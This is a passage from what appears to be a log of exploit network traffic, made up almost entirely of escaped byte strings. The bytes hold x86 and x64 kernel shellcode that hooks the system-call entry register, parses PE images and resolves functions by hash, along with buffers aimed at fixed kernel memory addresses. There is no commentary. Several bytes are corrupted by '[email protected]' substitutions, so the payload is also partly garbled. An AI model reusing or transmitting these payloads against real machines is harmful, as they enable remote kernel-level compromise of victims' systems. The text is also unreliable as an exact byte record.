x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 